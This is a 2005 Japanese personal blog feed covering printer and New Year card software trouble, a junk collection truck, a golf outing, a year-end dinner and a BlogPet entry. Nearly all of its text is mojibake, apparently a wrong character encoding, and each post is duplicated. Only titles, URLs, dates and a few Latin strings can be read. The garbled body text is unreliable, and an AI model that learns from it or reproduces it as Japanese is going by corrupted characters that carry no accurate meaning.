    ‚ֽ‚ׂ«ƒXƒ^ƒWƒI‚נ•ƒƒ}ƒVƒ“‚ֹƒCƒ“ƒXƒg[ƒ‹‚³‚¹‚ך‚־‚¢‚¢‚ֶ‚¨‚א‚ֱ‚½‚ס‚¾‚×C‚»‚ס‚ָּ‚ּƒ\ƒtƒg‚ֽ‚«‚¿‚ס‚ֶַ—‚³‚ך‚ִ‚¢‚ָ‚­‚ִCD-ROM‚ש‚ֲ‚©‚ח‚ָ‚¢‚ֶ‚©EEEE‚₪[‚סB‚ַ‚ֱ‚¿‚אg‚ֱ‚½‚±‚ֶ–³‚¢‚ס‚¾‚ָׂ[Bֵד‚ֽ‚₪‚¿‚ֹ‚ ‚י•M‚‚‚ֵƒRƒ“ƒo[ƒg‚·‚ך‚־‚ָ‚ס‚ֶ‚©‚ָ‚י‚©‚ָ‚‚ֶv‚ֱ‚ִC‚ֶ‚ט‚ ‚¦‚¸“d˜b‚נ״‚יB

    - -

    ‚¨‚נƒQƒbƒgדC_‚³‚ס‚ּ‰ֶ‚ֹs‚ֱ‚ִ‚¨‚נ’u‚¢‚ִ‚©‚חC‚¢‚ֱ‚½‚ס‹A‘מC‚³‚ח‚ְֹ‰ֶ‚ֹ‹}sB‚ַ‚₪‚ג‚חXPƒ}ƒVƒ“‚ֵ‚ֽƒvƒƒ“ƒ^[‚נ–³–”F¯‚µ‚ִˆף‚א‚ֵ‚«‚ִ‚¢‚י‚ז‚₪‚¾B–…‚ּ70‚®‚ח‚¢‚ּƒf[ƒ^‚ֽV‚½‚ֹ“—ֽ‚µ’¼‚µ‚ִ•M‚®‚י‚‚ֵˆף‚µ‚½‚ז‚₪‚¾‚×–ג‘ט‚ֽ•ƒe‚ּ800B‚»‚ּ‚‚ס‚‚ֽ‚ׂ«ƒXƒ^ƒWƒI‚ּƒf[ƒ^‚נ‚ֱ‚ִ‚¢‚ֱ‚ִ‚א•MƒOƒ‹ƒ‚ֽ”F¯‚µ‚ִ‚­‚ך‚ָ‚¢BHH‘־‰ƒ\ƒtƒg‚ֶ‚µ‚ִ‚©‚¢‚ִ‚ ‚י‚ּ‚ֹ‚ָ[[‚ֶv‚ֱ‚ִ@‚ֽ‚ׂ«ƒXƒ^ƒWƒI‚נ‚¿‚ו‚ֱ‚ֶ‚¢‚¶‚ֱ‚ִ‚½‚חCZ˜^‚¾‚¯•‚ֹ•‘¶‚ֵ‚«‚י‚ח‚µ‚¢B‚±‚ֱ‚¿‚נז‚ט‚ס‚ֵ‚‚½‚ח–³–”F¯B‚½‚¾C‘r’†‚ֶ‚©‚ּמ•ס‚נˆר‚«p‚¢‚ֵ‚­‚ך‚ָ‚¢‚ּ‚ֵCִ“xo‚·‚©‚ַ‚₪‚©‚ּ‘I‘נ‚נs‚₪•K—v‚ׂ ‚י‚ז‚₪‚¾EEEE‚ֶ@‚±‚±‚‚ֵ‚ֵ‰´‚ּƒTƒ|[ƒg‚ֽI—¹B

    - -

    @‚µ‚©‚µ”N‰ךף‚ּל¬‚ֽ‘‚‚ֹ—‚‚ז[[[ƒTƒ|[ƒg‚·‚י•‚ּg‚ֹ‚ָ‚ֱ‚ִ‚­‚ךEEEE‚ֶ”N––‚ֹv‚₪‚ּ‚ֵ‚ ‚ֱ‚½i‚—

    ]]>
    -‘|‚א‚¾‚¢‚½‚¢‚¨‚ם‚ֱ‚ִC‚ ‚ֶ‚ֽ‚¨—¿—‚נז‚ט‚ֹs‚­‚¾‚¯‚©‚ָ[‚ֶ—]—T‚נ‚װ‚ֱ‚±‚¢‚ִ‚¢‚½‚חC’¿‚µ‚­–…‚©‚ח“d˜bB‚ָ‚÷‚©ƒrƒbƒNƒJƒƒ‰‚ֹ‚¢‚י‚ח‚µ‚¢B‚ָ‚ס‚ֵ‚א”N‰ךף‚נ‚כ‚₪‚ֶ‚¨‚א‚ֱ‚½‚ח‚ַ‚₪‚ֹ‚אƒmƒYƒ‹‚ׂ¨‚©‚µ‚­‚ִדY—ם‚ֹˆף‚ֵ‚«‚ָ‚¢‚ח‚µ‚¢i‚»‚חC”N‰ךף‚®‚ח‚¢‚µ‚©ˆף‚µ‚ָ‚¢‚ס‚¶‚ב‚ָ[jBC—‚·‚י‚ֹ‚א”N‰ךף‚נ‚ח‚ָ‚¢‚ֶ‚ַ‚₪‚ֹ‚א‚ָ‚ח‚ָ‚¢‚ּ‚ֵ”ƒ‚¢·‚¦‚י‚±‚ֶ‚ֹ‚µ‚½‚ח‚µ‚­ƒrƒbƒNƒJƒƒ‰‚ֹs‚ֱ‚½‚ּ‚¾‚דXˆץ‚ֹ•·‚¢‚ִ‚אֵד‚ּ‚Q‚ֲ‚©‚חi‚ך‚ָ‚­‚ִ¢‚ֱ‚ִ˜A—‚µ‚ִ‚«‚½‚ח‚µ‚¢B
    -@‚ ‚ס‚‚טװ‚ָׂ‚¢‚ח‚µ‚¢‚ּ‚ֵCƒTƒ|[ƒg‚µ‚ג‚·‚»‚₪‚ָEPSON‚נ©‚‚ִ‚¨‚¢‚½B

    - -

    ‚±‚ס‚ָ‚ֹ‚¹‚ֱ‚ֿ‹l‚‚ֱ‚ִ‚©‚ח1000–‡ד‚אˆ¶–¼ˆף‚·‚י‚ּ‚©‚זEEEE

    - -

    ‚ֶCv‚ֱ‚ִ‚¨‚ּף‚¯ז‚ט‚ֹo‚©‚¯‚½‚ח“r’†‚ֵ“d˜b‚×B‚ַ‚₪‚ג‚חV‚µ‚¢ƒvƒƒ“ƒ^[‚וך‚ּg‚ֱ‚ִ‚יMe‚ּƒ}ƒVƒ“‚ֵ‚ֽדט‚­”F¯‚ֵ‚«‚ָ‚©‚ֱ‚½‚ח‚µ‚¢B•ƒ‚×g‚ֱ‚ִ‚יXP‚ָ‚ח”F¯‚·‚י‚ח‚µ‚¢‚ּ‚¾‚×C¡“x‚ֽƒ\ƒtƒg‚ּ–ג‘ט‚×B

    - -

    •ךƒ}ƒVƒ“@OSFMe@ƒ\ƒtƒgF‚ֽ‚ׂ«ƒXƒ^ƒWƒI‚Q‚O‚O‚P@ˆ¶זƒf[ƒ^F“—ֽֿ‚
    -•ƒƒ}ƒVƒ“@OSFXP@ƒ\ƒtƒgF•M‚®‚י‚@–¢g—p

    - -

    ‚ֽ‚ׂ«ƒXƒ^ƒWƒI‚נ•ƒƒ}ƒVƒ“‚ֹƒCƒ“ƒXƒg[ƒ‹‚³‚¹‚ך‚־‚¢‚¢‚ֶ‚¨‚א‚ֱ‚½‚ס‚¾‚×C‚»‚ס‚ָּ‚ּƒ\ƒtƒg‚ֽ‚«‚¿‚ס‚ֶַ—‚³‚ך‚ִ‚¢‚ָ‚­‚ִCD-ROM‚ש‚ֲ‚©‚ח‚ָ‚¢‚ֶ‚©EEEE‚₪[‚סB‚ַ‚ֱ‚¿‚אg‚ֱ‚½‚±‚ֶ–³‚¢‚ס‚¾‚ָׂ[Bֵד‚ֽ‚₪‚¿‚ֹ‚ ‚י•M‚‚‚ֵƒRƒ“ƒo[ƒg‚·‚ך‚־‚ָ‚ס‚ֶ‚©‚ָ‚י‚©‚ָ‚‚ֶv‚ֱ‚ִC‚ֶ‚ט‚ ‚¦‚¸“d˜b‚נ״‚יB

    - -

    ‚¨‚נƒQƒbƒgדC_‚³‚ס‚ּ‰ֶ‚ֹs‚ֱ‚ִ‚¨‚נ’u‚¢‚ִ‚©‚חC‚¢‚ֱ‚½‚ס‹A‘מC‚³‚ח‚ְֹ‰ֶ‚ֹ‹}sB‚ַ‚₪‚ג‚חXPƒ}ƒVƒ“‚ֵ‚ֽƒvƒƒ“ƒ^[‚נ–³–”F¯‚µ‚ִˆף‚א‚ֵ‚«‚ִ‚¢‚י‚ז‚₪‚¾B–…‚ּ70‚®‚ח‚¢‚ּƒf[ƒ^‚ֽV‚½‚ֹ“—ֽ‚µ’¼‚µ‚ִ•M‚®‚י‚‚ֵˆף‚µ‚½‚ז‚₪‚¾‚×–ג‘ט‚ֽ•ƒe‚ּ800B‚»‚ּ‚‚ס‚‚ֽ‚ׂ«ƒXƒ^ƒWƒI‚ּƒf[ƒ^‚נ‚ֱ‚ִ‚¢‚ֱ‚ִ‚א•MƒOƒ‹ƒ‚ֽ”F¯‚µ‚ִ‚­‚ך‚ָ‚¢BHH‘־‰ƒ\ƒtƒg‚ֶ‚µ‚ִ‚©‚¢‚ִ‚ ‚י‚ּ‚ֹ‚ָ[[‚ֶv‚ֱ‚ִ@‚ֽ‚ׂ«ƒXƒ^ƒWƒI‚נ‚¿‚ו‚ֱ‚ֶ‚¢‚¶‚ֱ‚ִ‚½‚חCZ˜^‚¾‚¯•‚ֹ•‘¶‚ֵ‚«‚י‚ח‚µ‚¢B‚±‚ֱ‚¿‚נז‚ט‚ס‚ֵ‚‚½‚ח–³–”F¯B‚½‚¾C‘r’†‚ֶ‚©‚ּמ•ס‚נˆר‚«p‚¢‚ֵ‚­‚ך‚ָ‚¢‚ּ‚ֵCִ“xo‚·‚©‚ַ‚₪‚©‚ּ‘I‘נ‚נs‚₪•K—v‚ׂ ‚י‚ז‚₪‚¾EEEE‚ֶ@‚±‚±‚‚ֵ‚ֵ‰´‚ּƒTƒ|[ƒg‚ֽI—¹B

    - -

    @‚µ‚©‚µ”N‰ךף‚ּל¬‚ֽ‘‚‚ֹ—‚‚ז[[[ƒTƒ|[ƒg‚·‚י•‚ּg‚ֹ‚ָ‚ֱ‚ִ‚­‚ךEEEE‚ֶ”N––‚ֹv‚₪‚ּ‚ֵ‚ ‚ֱ‚½i‚—

    ]]>
    -g•׃ -tamuyou -2005-12-31T19:23:38+09:00 -
    - -”p•i‰ס‹ֶׂ‚³‚ס‚ ‚ט‚ֶׂ‚₪ -http://tamuyou.haun.org/mt/archives/2005/12/post_378.html -@‘O’†‚ֹc‚ֱ‚½”N‰ךף‚ּˆך¾—“‚נ‘‚±‚₪‚ֶל‹ֶ‚נ‚µ‚ִ‚¢‚½‚חC_‚³‚ס‚×u”p•i‰ס‚×[v‚ֶ‹©‚ס‚ֵ‚«‚½‚ּ‚ֵ‚ ‚ם‚ִ‚ִƒxƒ‰ƒ“ƒ_‚ֹo‚י‚ֶ@¬‚³‚­u–³—¿‚ֹ‚ִEEE–³—¿‚ֹ‚ִ‰ס‚¢‚½‚µ‚‚·v‚ֶ•·‚±‚¦‚י‚ּ‚ֵ‚ ‚ם‚ִ‚ִO‚ײBƒXƒs[ƒJ[‚ּ÷‚ו·‚±‚¦‚ָ‚­‚ָ‚ֱ‚ִ‚µ‚‚ֱ‚½‚ּ‚ֵC‚¾‚¢‚½‚¢÷‚ו·‚±‚¦‚½•‚ײ‘–‚ֱ‚ִCנ·“_‚²‚ֶ‚ֹ‚«‚ו‚כ‚«‚ו‚כ‚µ‚½‚חC‚Q‚O‚O‚‚®‚ח‚¢‘–‚ֱ‚½‚ֶ‚±‚כ‚ֵ‚ָ‚ס‚ֶ‚©ƒgƒ‰ƒbƒN‚נ”­©Cנֲ‚µ‚½‚ח2000‰~‚ֵ‚ֱ‚ִ‚¢‚ֱ‚ִ‚­‚ך‚י‚ֶIIII
    -@29ƒCƒ“ƒ`‚ּƒuƒ‰ƒEƒ“ַ‚ֱ‚ִCƒƒTƒCƒNƒ‹”ן—p‚¾‚¯‚ֵ6500‰~‚®‚ח‚¢‚ּ‚ֽ‚¸‚¾‚×C‚¸‚¢‚װ‚סˆְ‚¢‚ָ‚[B‚¨‚ֱ‚³‚ס‚ּ˜b‚¾‚ֶ“d˜b‚·‚י‚ֶˆר‚«ז‚ט‚ֹ—ˆ‚ִ‚­‚ך‚י‚ח‚µ‚¢B–¼h‚נ‚א‚ח‚ֱ‚½‚׋‚©‚חז‚ט‚ֹ—ˆ‚ִ‚י‚ח‚µ‚¢B”p•i‰ס‚א‘ו•ֿ‚¾‚ֻ‚¥B

    - -

    @‚»‚ך‚ֹ‚µ‚ִ‚א”N“א‚ֹ‚ֵ‚©‚¢ƒSƒ~‚ו׀‚ֳ‚¢‚ִ•‚©‚ֱ‚½‚ז

    ]]>
    -@‘O’†‚ֹc‚ֱ‚½”N‰ךף‚ּˆך¾—“‚נ‘‚±‚₪‚ֶל‹ֶ‚נ‚µ‚ִ‚¢‚½‚חC_‚³‚ס‚×u”p•i‰ס‚×[v‚ֶ‹©‚ס‚ֵ‚«‚½‚ּ‚ֵ‚ ‚ם‚ִ‚ִƒxƒ‰ƒ“ƒ_‚ֹo‚י‚ֶ@¬‚³‚­u–³—¿‚ֹ‚ִEEE–³—¿‚ֹ‚ִ‰ס‚¢‚½‚µ‚‚·v‚ֶ•·‚±‚¦‚י‚ּ‚ֵ‚ ‚ם‚ִ‚ִO‚ײBƒXƒs[ƒJ[‚ּ÷‚ו·‚±‚¦‚ָ‚­‚ָ‚ֱ‚ִ‚µ‚‚ֱ‚½‚ּ‚ֵC‚¾‚¢‚½‚¢÷‚ו·‚±‚¦‚½•‚ײ‘–‚ֱ‚ִCנ·“_‚²‚ֶ‚ֹ‚«‚ו‚כ‚«‚ו‚כ‚µ‚½‚חC‚Q‚O‚O‚‚®‚ח‚¢‘–‚ֱ‚½‚ֶ‚±‚כ‚ֵ‚ָ‚ס‚ֶ‚©ƒgƒ‰ƒbƒN‚נ”­©Cנֲ‚µ‚½‚ח2000‰~‚ֵ‚ֱ‚ִ‚¢‚ֱ‚ִ‚­‚ך‚י‚ֶIIII
    -@29ƒCƒ“ƒ`‚ּƒuƒ‰ƒEƒ“ַ‚ֱ‚ִCƒƒTƒCƒNƒ‹”ן—p‚¾‚¯‚ֵ6500‰~‚®‚ח‚¢‚ּ‚ֽ‚¸‚¾‚×C‚¸‚¢‚װ‚סˆְ‚¢‚ָ‚[B‚¨‚ֱ‚³‚ס‚ּ˜b‚¾‚ֶ“d˜b‚·‚י‚ֶˆר‚«ז‚ט‚ֹ—ˆ‚ִ‚­‚ך‚י‚ח‚µ‚¢B–¼h‚נ‚א‚ח‚ֱ‚½‚׋‚©‚חז‚ט‚ֹ—ˆ‚ִ‚י‚ח‚µ‚¢B”p•i‰ס‚א‘ו•ֿ‚¾‚ֻ‚¥B

    - -

    @‚»‚ך‚ֹ‚µ‚ִ‚א”N“א‚ֹ‚ֵ‚©‚¢ƒSƒ~‚ו׀‚ֳ‚¢‚ִ•‚©‚ֱ‚½‚ז

    ]]>
    -g•׃ -tamuyou -2005-12-30T15:20:19+09:00 -
    - -‚¢‚‚³‚ח”N‰ךף‚נ‘‚­‚©‚ח‚©‚א‚µ‚ך‚ָ‚¢‚× -http://tamuyou.haun.org/mt/archives/2005/12/post_377.html -@UX‹x‰ֹ‚ׂ ‚ט‚ָ‚ׂח¡X”N‰ךף‚נ‘‚¢‚ִ‚¢‚י‰´EEEBנ”N‚ֽ‘r’†‚¾‚ֱ‚½‚±‚ֶ‚א‚ ‚טˆךנ”N‚ּ”N‰ךף‚א©‚ָ‚ׂח‚ ‚ִזƒf[ƒ^‚ּXV‚נs‚¢Aˆף‚µ‚½‚ם‚¯‚¾‚ׂ±‚±‚ֵ‚ֱׂ‚­‚ט‚·‚י‚±‚ֶ‚×B
    -u‚‚ֶ‚‚ִˆף‚µ‚½‚חֵ‰‚ּˆך–‡‚µ‚©—X•ײ”װ†‚׈ף‚³‚ך‚ָ‚¢v
    -‚ַ‚₪‚¢‚₪‚±‚ֶ‚זI•M‚‚‚u‚…‚’D‚P‚TIII

    - -

    ‚³‚ֱ‚»‚­‚®‚®‚ֱ‚ִ©‚י‚ֶAuˆ¶–¼ˆף‚ֵA—X•ײ”װ†‚דr’†‚©‚חˆף‚³‚ך‚ָ‚¢v‚ֶ‚¢‚₪ƒGƒ“ƒgƒ[‚ׂ ‚ט‚‚·‚זI‰‚³‚סB‚ַ‚₪‚ג‚חƒtƒHƒ“ƒg’ט‚ּ–ג‘ט‚¾‚ֱ‚½‚ח‚µ‚¢‚׃eƒXƒg‚ֵ•¡”–‡‚ָ‚ס‚ִˆף‚µ‚ָ‚¢‚©‚ח‚ם‚©‚ס‚ָ‚©‚ֱ‚½‚זB‚ֱׂ‚­‚טB

    - -

    ‚ֶ‚ט‚ ‚¦‚¸’ט‚ֽ’¼‚µ‚ִ‚‚½‚ׂ·‚ֵ‚ֹ—X•ײ”װ†‚¾‚¯ˆף‚³‚ך‚ָ‚¢—t‘‚ֵׂ‚«‚ִ‚µ‚‚ֱ‚ִ‚¢‚י‚ּ‚ֵA¡”N‚ֽט‘‚«‚ֵ‘‚«‚‚µ‚½‚זI—X•ײך†B—ˆ”N‚±‚»‚ֽ‚¿‚ב‚ס‚ֶˆף‚µ‚ִ‚ג‚יI

    ]]>
    -@UX‹x‰ֹ‚ׂ ‚ט‚ָ‚ׂח¡X”N‰ךף‚נ‘‚¢‚ִ‚¢‚י‰´EEEBנ”N‚ֽ‘r’†‚¾‚ֱ‚½‚±‚ֶ‚א‚ ‚טˆךנ”N‚ּ”N‰ךף‚א©‚ָ‚ׂח‚ ‚ִזƒf[ƒ^‚ּXV‚נs‚¢Aˆף‚µ‚½‚ם‚¯‚¾‚ׂ±‚±‚ֵ‚ֱׂ‚­‚ט‚·‚י‚±‚ֶ‚×B
    -u‚‚ֶ‚‚ִˆף‚µ‚½‚חֵ‰‚ּˆך–‡‚µ‚©—X•ײ”װ†‚׈ף‚³‚ך‚ָ‚¢v
    -‚ַ‚₪‚¢‚₪‚±‚ֶ‚זI•M‚‚‚u‚…‚’D‚P‚TIII

    - -

    ‚³‚ֱ‚»‚­‚®‚®‚ֱ‚ִ©‚י‚ֶAuˆ¶–¼ˆף‚ֵA—X•ײ”װ†‚דr’†‚©‚חˆף‚³‚ך‚ָ‚¢v‚ֶ‚¢‚₪ƒGƒ“ƒgƒ[‚ׂ ‚ט‚‚·‚זI‰‚³‚סB‚ַ‚₪‚ג‚חƒtƒHƒ“ƒg’ט‚ּ–ג‘ט‚¾‚ֱ‚½‚ח‚µ‚¢‚׃eƒXƒg‚ֵ•¡”–‡‚ָ‚ס‚ִˆף‚µ‚ָ‚¢‚©‚ח‚ם‚©‚ס‚ָ‚©‚ֱ‚½‚זB‚ֱׂ‚­‚טB

    - -

    ‚ֶ‚ט‚ ‚¦‚¸’ט‚ֽ’¼‚µ‚ִ‚‚½‚ׂ·‚ֵ‚ֹ—X•ײ”װ†‚¾‚¯ˆף‚³‚ך‚ָ‚¢—t‘‚ֵׂ‚«‚ִ‚µ‚‚ֱ‚ִ‚¢‚י‚ּ‚ֵA¡”N‚ֽט‘‚«‚ֵ‘‚«‚‚µ‚½‚זI—X•ײך†B—ˆ”N‚±‚»‚ֽ‚¿‚ב‚ס‚ֶˆף‚µ‚ִ‚ג‚יI

    ]]>
    -g•׃ -tamuyou -2005-12-29T16:57:17+09:00 -
    - -”[‚‚ּƒSƒ‹ƒt‚ֽ•—‚׋­‚¢ -http://tamuyou.haun.org/mt/archives/2005/12/post_376.html -@¡”N‚ֽ”[‰ן‚ּ‚©‚ם‚ט‚ֹ”[‚ƒSƒ‹ƒt‚ֶ‚¢‚₪‚±‚ֶ‚ֵA’m‚ט‡‚¢‚ֶח—t‚ײƒSƒ‹ƒt‚ֹs‚ֱ‚½Bs‚ֱ‚½‚ּ‚ֽ–{ח—t‚b‚bB‘h‰ה‚h‚b‚©‚ח5‚‹‚‚ֶ¾‚₪‚×A‘¾‚¢“¹‚ֵׂ‚«‚ִ‚¢‚ִ‚‘¬~‚ט‚½‚ח‚·‚®‚ֲ‚¢‚½B”סם‚ֹ•ײ—˜‚ּ‚¢‚¢ƒR[ƒX‚¾B
    -@‘O”¼‚ֽ•—‚׋­‚­A¦‚¯‚ׂ·‚י‚‚ַ‚ּƒRƒ“ƒfƒBƒVƒ‡ƒ“‚¾‚ֱ‚½‚×Aד‚©‚ח•—‚אב±ד‚‚ט‚·‚²‚µ‚ג‚·‚©‚ֱ‚½B

    - -

    @ƒR[ƒX‚ֽ“A’†A¼‚ּ9ƒz[ƒ‹3ƒpƒ^[ƒ“‚ֵA“¨’†¨¼¨“‚ּƒ[ƒe‚ֵ‰ס‚י`‚נז‚ֱ‚ִ‚¢‚יBֳ‚¢ƒR[ƒX‚ּ‚ז‚₪‚¾‚×A‹Md•i‹אֹ‚אֵV®‚ֹ“‚ך‘ײ‚¦H–‚נ‚µ‚ִ‚¢‚½‚µAƒgƒCƒ‚ג•—˜C‚א‚ָ‚©‚ָ‚©דY—ם‚ֹƒƒtƒH[ƒ€‚³‚ך‚ִ‚¢‚½B

    - -

    @’l’i‚אˆְ‚¢‚µA‚¢‚¢‚ס‚¶‚ב‚ָ‚¢‚©‚ָ[B‰ס‚ֽ‚א‚₪‚¿‚ו‚ֱ‚ֶ‚¢‚¢ƒXƒRƒA‚ֵ‰ס‚ט‚½‚¢i‚—

    ]]>
    -@¡”N‚ֽ”[‰ן‚ּ‚©‚ם‚ט‚ֹ”[‚ƒSƒ‹ƒt‚ֶ‚¢‚₪‚±‚ֶ‚ֵA’m‚ט‡‚¢‚ֶח—t‚ײƒSƒ‹ƒt‚ֹs‚ֱ‚½Bs‚ֱ‚½‚ּ‚ֽ–{ח—t‚b‚bB‘h‰ה‚h‚b‚©‚ח5‚‹‚‚ֶ¾‚₪‚×A‘¾‚¢“¹‚ֵׂ‚«‚ִ‚¢‚ִ‚‘¬~‚ט‚½‚ח‚·‚®‚ֲ‚¢‚½B”סם‚ֹ•ײ—˜‚ּ‚¢‚¢ƒR[ƒX‚¾B
    -@‘O”¼‚ֽ•—‚׋­‚­A¦‚¯‚ׂ·‚י‚‚ַ‚ּƒRƒ“ƒfƒBƒVƒ‡ƒ“‚¾‚ֱ‚½‚×Aד‚©‚ח•—‚אב±ד‚‚ט‚·‚²‚µ‚ג‚·‚©‚ֱ‚½B

    - -

    @ƒR[ƒX‚ֽ“A’†A¼‚ּ9ƒz[ƒ‹3ƒpƒ^[ƒ“‚ֵA“¨’†¨¼¨“‚ּƒ[ƒe‚ֵ‰ס‚י`‚נז‚ֱ‚ִ‚¢‚יBֳ‚¢ƒR[ƒX‚ּ‚ז‚₪‚¾‚×A‹Md•i‹אֹ‚אֵV®‚ֹ“‚ך‘ײ‚¦H–‚נ‚µ‚ִ‚¢‚½‚µAƒgƒCƒ‚ג•—˜C‚א‚ָ‚©‚ָ‚©דY—ם‚ֹƒƒtƒH[ƒ€‚³‚ך‚ִ‚¢‚½B

    - -

    @’l’i‚אˆְ‚¢‚µA‚¢‚¢‚ס‚¶‚ב‚ָ‚¢‚©‚ָ[B‰ס‚ֽ‚א‚₪‚¿‚ו‚ֱ‚ֶ‚¢‚¢ƒXƒRƒA‚ֵ‰ס‚ט‚½‚¢i‚—

    ]]>
    -g•׃ -tamuyou -2005-12-28T17:59:57+09:00 -
    - -‚¨‚µ‚ב‚ךn˜aH -http://tamuyou.haun.org/mt/archives/2005/12/post_375.html -–Y”N‰ן‚נ‚·‚י‚ֶ‚¢‚₪‚ּ‚ֵ‚₪‚¿‚ּ—¼eA–…A—¼e‚ּ—Fl‚×W‚‚י‚ֶ‚¢‚₪¬—¯‚ּ“X‚ײBs‚ֱ‚½‚ּ‚ֽ¬—¯ƒVƒeƒBƒZƒ“ƒ^[41K‚·‚‚ך‰ֶB
    -˜aHƒ_ƒCƒjƒ“ƒO‚ֵ–יi‚×דY—ם‚ֶ¾‚₪‚ּ‚×A“X‚נˆ‚‚½e•ƒ‚ּ——R‚¾‚ֱ‚½‚ז‚₪‚¾‚×A‘וl”‚ֲֵ÷‚נז‚ֱ‚½‚ח‚»‚₪‚¢‚₪‚ֶ‚±‚כ‚ֽg‚¦‚ָ‚¢‚ּ‚×ם“…Bˆִ‚ּ’טA‘‹‚ּ–³‚¢ֲ÷‚¾‚ֱ‚½i‚—B
    -@‚‚ A–יi‚ֽ‚ַ‚₪‚ֵ‚א‚¢‚¢‚ּ‚ֵ‚₪‚‚¢—¿—‚ֹד‚נ‘ֵ‚ֱ‚½‚ס‚¾‚×A‚±‚±‚ֽ‚¯‚ֱ‚±‚₪‹q‚ּl‚×—ַ‚­‹³ˆח‚³‚ך‚ִ‚¢‚ִ‚ז‚©‚ֱ‚½‚©‚אB¡“x‚ֽ‚א‚₪‚¿‚ו‚ֱ‚ֶ­l”‚ֵ—ˆ‚½‚¢‚ֻ

    ]]>
    -–Y”N‰ן‚נ‚·‚י‚ֶ‚¢‚₪‚ּ‚ֵ‚₪‚¿‚ּ—¼eA–…A—¼e‚ּ—Fl‚×W‚‚י‚ֶ‚¢‚₪¬—¯‚ּ“X‚ײBs‚ֱ‚½‚ּ‚ֽ¬—¯ƒVƒeƒBƒZƒ“ƒ^[41K‚·‚‚ך‰ֶB
    -˜aHƒ_ƒCƒjƒ“ƒO‚ֵ–יi‚×דY—ם‚ֶ¾‚₪‚ּ‚×A“X‚נˆ‚‚½e•ƒ‚ּ——R‚¾‚ֱ‚½‚ז‚₪‚¾‚×A‘וl”‚ֲֵ÷‚נז‚ֱ‚½‚ח‚»‚₪‚¢‚₪‚ֶ‚±‚כ‚ֽg‚¦‚ָ‚¢‚ּ‚×ם“…Bˆִ‚ּ’טA‘‹‚ּ–³‚¢ֲ÷‚¾‚ֱ‚½i‚—B
    -@‚‚ A–יi‚ֽ‚ַ‚₪‚ֵ‚א‚¢‚¢‚ּ‚ֵ‚₪‚‚¢—¿—‚ֹד‚נ‘ֵ‚ֱ‚½‚ס‚¾‚×A‚±‚±‚ֽ‚¯‚ֱ‚±‚₪‹q‚ּl‚×—ַ‚­‹³ˆח‚³‚ך‚ִ‚¢‚ִ‚ז‚©‚ֱ‚½‚©‚אB¡“x‚ֽ‚א‚₪‚¿‚ו‚ֱ‚ֶ­l”‚ֵ—ˆ‚½‚¢‚ֻ

    ]]>
    -“X -tamuyou -2005-12-27T21:55:49+09:00 -
    - -“סd—U‰(BlogPet) -http://tamuyou.haun.org/mt/archives/2005/12/blogpet_6.html -‚«‚ו‚₪‚ֽA€‚ֹ—U‰‚µ‚½‚©‚ֱ‚½B
    -

    -¡‚³‚ח‚ָ‚ׂח‚¾‚×A‹³÷‚ֵ‚ּצ‹ֶƒV[ƒ“‚ֵ‚ֽ’©‚ֱ‚ֿ‚ח‚©‚ח†‹ƒ‚µ‚ִ‚µ‚‚¢A–‚נמ‚ח‚µ‚ִo‹־‚·‚י–‚ֹ‚ָ‚ֱ‚ִ‚µ‚‚ֱ‚½‚ׂ¢‚¢‰f‰ז‚ֵ‚µ‚½B
    -—]’k‚¾‚×AS A Y U R I‚ֵ‚א˜b‘ט‚ּƒ`ƒƒƒ“‚ֶˆב‚ֱ‚ִ‘f–p‚ָ‚¢‚¢´‚¶B
    -——D‚ֱ‚ִ•ֿ‚ם‚י‚א‚ס‚¾‚ָ[‚ֶ‰‚‚ִ´SB
    -ֵI“I‚ֹ•ƒ‚ּ€‚ֵ“s‰ן‚©‚ח‰ֶ‚ֹ–‚ֱ‚½’·’jB
    -‰‹‚ּ•ךe–נ‚נƒ`ƒƒƒ“EƒcƒBƒC[ו‰‰‚ּ‰f‰זB
    -’n•‚ּ”_‘÷‚ֵ‹³t‚נ‚µ‚ִ‚¢‚½•ƒ‚ּ‘’‹VƒV[ƒ“‚ֵu“¼“ל–kv‚ֶv‚ֱ‚ִ‚µ‚‚ֱ‚½i‚—‰—צ‚ּ‚«‚½“¹p o s t e d w i t h a m a z l e t o n.c o.j p‚ֵ׳‚נ©‚י
    -

    - -


    -*‚±‚ּƒGƒ“ƒgƒ‚ֽABlogPet(ƒuƒƒOƒyƒbƒg)‚ּuƒ`ƒv‚ב‚«‚‚µ‚½B
    -

    ]]>
    -‚«‚ו‚₪‚ֽA€‚ֹ—U‰‚µ‚½‚©‚ֱ‚½B
    -

    -¡‚³‚ח‚ָ‚ׂח‚¾‚×A‹³÷‚ֵ‚ּצ‹ֶƒV[ƒ“‚ֵ‚ֽ’©‚ֱ‚ֿ‚ח‚©‚ח†‹ƒ‚µ‚ִ‚µ‚‚¢A–‚נמ‚ח‚µ‚ִo‹־‚·‚י–‚ֹ‚ָ‚ֱ‚ִ‚µ‚‚ֱ‚½‚ׂ¢‚¢‰f‰ז‚ֵ‚µ‚½B
    -—]’k‚¾‚×AS A Y U R I‚ֵ‚א˜b‘ט‚ּƒ`ƒƒƒ“‚ֶˆב‚ֱ‚ִ‘f–p‚ָ‚¢‚¢´‚¶B
    -——D‚ֱ‚ִ•ֿ‚ם‚י‚א‚ס‚¾‚ָ[‚ֶ‰‚‚ִ´SB
    -ֵI“I‚ֹ•ƒ‚ּ€‚ֵ“s‰ן‚©‚ח‰ֶ‚ֹ–‚ֱ‚½’·’jB
    -‰‹‚ּ•ךe–נ‚נƒ`ƒƒƒ“EƒcƒBƒC[ו‰‰‚ּ‰f‰זB
    -’n•‚ּ”_‘÷‚ֵ‹³t‚נ‚µ‚ִ‚¢‚½•ƒ‚ּ‘’‹VƒV[ƒ“‚ֵu“¼“ל–kv‚ֶv‚ֱ‚ִ‚µ‚‚ֱ‚½i‚—‰—צ‚ּ‚«‚½“¹p o s t e d w i t h a m a z l e t o n.c o.j p‚ֵ׳‚נ©‚י
    -

    - -


    -*‚±‚ּƒGƒ“ƒgƒ‚ֽABlogPet(ƒuƒƒOƒyƒbƒg)‚ּuƒ`ƒv‚ב‚«‚‚µ‚½B
    -

    ]]>
    - -tamuyou -2005-12-27T09:04:35+09:00 -
